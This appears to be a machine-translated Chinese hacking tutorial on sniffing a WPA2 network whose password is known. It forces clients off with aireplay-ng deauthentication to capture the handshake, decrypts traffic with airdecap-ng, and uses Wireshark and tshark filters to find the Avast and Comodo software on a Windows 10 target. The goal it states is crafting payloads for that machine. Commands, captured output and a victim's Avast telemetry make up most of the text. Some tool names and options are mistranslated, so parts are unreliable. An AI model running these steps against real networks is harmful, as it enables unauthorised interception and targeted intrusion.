确定安装在 Windows 计算机上的防病毒和防火墙软件对于准备创建目标 stager 或有效负载的攻击者至关重要。 通过隐蔽的深度数据包检测,可以轻松识别该信息。
这种攻击假设目标网络的 Wi-Fi 密码已知。 使用密码,攻击者可以观察遍历网络的数据并枚举已安装的安全软件。 当良性网络流量被过滤掉后,流行的防病毒和防火墙解决方案变得很容易识别。
我们将学习如何在不向目标路由器进行身份验证的情况下捕获和解密 Wi-Fi 流量,我们将执行数据包检查以找出操作系统上安装的第三方安全应用程序的种类。
- 不要错过:拦截本地网络上的 Windows 密码
第 1 步:捕获 Wi-Fi 流量
要开始使用 Kali,请使用airmon-ng命令停止在后台运行的所有可能干扰无线网卡的进程。
~# airmon-ng check kill
Killing these processes:
PID Name
2891 wpa_supplicant
在 Alfa 适配器上启用监控模式(或另一个无线适配器) 与airmon-ng 启动 wlan0命令。
~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy2 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
(mac80211 station mode vif disabled for [phy2]wlan0)
然后,执行初始airodump-ng扫描以枚举周围区域的 Wi-Fi 网络。
~# airodump-ng wlan0mon
CH 6 ][ Elapsed: 36 s ][ 2020-04-06 20:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -19 13 6 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
识别出路由器后,按 Control-C 停止扫描。 通过包含以下内容对 Wi-Fi 路由器执行目标数据包捕获-渠道,-写,–bssid, 和–essid选项。
~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
Aireplay-ng 将取消对连接到路由器的设备的身份验证。 此命令是捕获 WPA2 握手数据所必需的。 捕获的数据包只能通过有效的握手进行解密。
打开一个新终端并使用以下命令aireplay-ng命令向路由器发送三个“deauth”数据包,强制通过身份验证的用户重新连接。
~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon
05:12:46 Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47 Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
成功的攻击将在右上角产生“WPA 握手”通知airodump-ng终端。
CH 9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:20:91:B4:F8:33 -20 100 8308 1895 0 11 270 WPA2 CCMP PSK NullByte_Network
BSSID STATION PWR Rate Lost Frames Probe
此时,airodump-ng窗口应尽可能长时间(即许多小时)继续捕获数据包。 随着时间的推移,目标 Windows 10 计算机中的安全软件将定期尝试更新应用程序和病毒定义数据库。 这些 Web 查询对于可以访问准备发动有针对性的攻击的网络的黑客来说很有价值。
第 2 步:解密 PCAP
Airdecap-ng 是抓包解密工具,是 Aircrack-ng 套件的一部分。
~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap
Total number of stations seen 8
Total number of packets read 32310
Total number of WEP data packets 0
Total number of WPA data packets 4555
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 3435
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
Airdecap-ng 将使用 Wi-Fi ESSID (-e) 和密码 (-p) 来解密和过滤掉属于网络的数据包。 在上面的示例中,我们可以看到 3435 个 WPA 解密数据包。 Airdecap-ng 将在当前目录中创建一个名为“capture-01-dec.cap”的文件。
解密 PCAP 后,将新的 capture-01-dec.cap 文件导入 Wireshark。
第 3 步:搜索防病毒软件 (Avast)
阿瓦斯特是世界上最受欢迎的抗病毒软件解决方案之一。
已知的 Avast 域包括 avast.com 和 avcdn.net,这是其主要的内容分发网络 (CDN)。 这些域每天都用于获取病毒库和软件更新以及发送遥测信息。 可以使用以下显示过滤器在 Wireshark 中过滤掉这些域。
ip.host ~ "(?i)(avast|avcdn)\.*"
许多防病毒域都可以添加到过滤器中并用竖线 (|) 分隔。
上述结果强烈表明该计算机正在使用 Avast 杀毒软件。 可以进一步检查数据以识别此防病毒提供商常用的用户代理字符串。
http.user_agent ~ "(?i)avast*"
这个特定的 HTTP 流调用 POST 请求并将一些未加密的数据传送到 Avast 服务器。 正如我们所见,该请求源自带有 Avast 用户代理的 Windows 10 计算机。
HTTP 流的主体包含一些与目标设备相关的未加密数据。 CPU 类型、Windows 10 主机名和主板架构,以及 Avast 版本和配置设置,都可以从单个 HTTP 流中发现。
POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:
GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041
这些数据对于网络上的攻击者非常有价值,因为它使他们能够制作特定于该用户和操作系统的有效负载。
除了 Wireshark,鲨鱼和grep可以轻松地在标准输出中分别打印和过滤 DNS 请求。 附加排序-u到命令以仅显示唯一的域(即没有重复的域)。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast\|avcdn" | sort -u
b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com
第 4 步:搜索防火墙软件 (Comodo)
科摩多防火墙是一种流行的防火墙解决方案,旨在监控传入和传出流量以识别威胁并防止攻击。
它是DNS 服务器配置使网络上的攻击者难以枚举已安装的应用程序和访问过的网站。 尽管如此,Comodo 软件仍会偶尔检查软件更新,为攻击者提供他们需要的所有信息。
ip.host ~ "(?i)(comodo)\.*"
要在标准输出中查看查询的域,请检查 PCAP鲨鱼并过滤掉 DNS 请求。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name
此命令可能会产生包含数千个域、IP 地址和重复条目的大量输出。 追加种类和独特的命令来计算最常查询的服务器。
~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c
2 218.0.101.95.in-addr.arpa
72 22.70.154.156.in-addr.arpa
14 22.71.154.156.in-addr.arpa
1 download.comodo.com
1 ncc.avast.com
1 su.ff.avast.com
2 v10.vortex-win.data.microsoft.com
1 wireshark.org
请注意, 22.70.154.156.in-addr.arpa 地址在 PCAP 中出现 72 次。 A快速搜索和IP查询建议156.154.70.22多年来一直是 Comodo DNS 服务器。 虽然这并不一定意味着目标安装了 Comodo 软件,但这表明他们具有安全意识。
最后的想法
本文仅介绍了一些Wireshark 显示过滤器. 有许多HTTP,知识产权, 和域名系统在收集有关目标的信息时可以帮助黑客的过滤器。
具有全面的流行的防病毒软件列表,攻击者通常能够确定目标 Windows 机器是否安装了安全软件。 更可怕的是,软件枚举是在没有连接到 Wi-Fi 网络或需要物理访问计算机的情况下完成的。
如果您喜欢这篇文章,请在 Twitter 上关注我@tokyoneon_和GitHub跟上我目前的项目。 如有问题和疑虑,请在 Twitter 上发表评论或给我发消息。
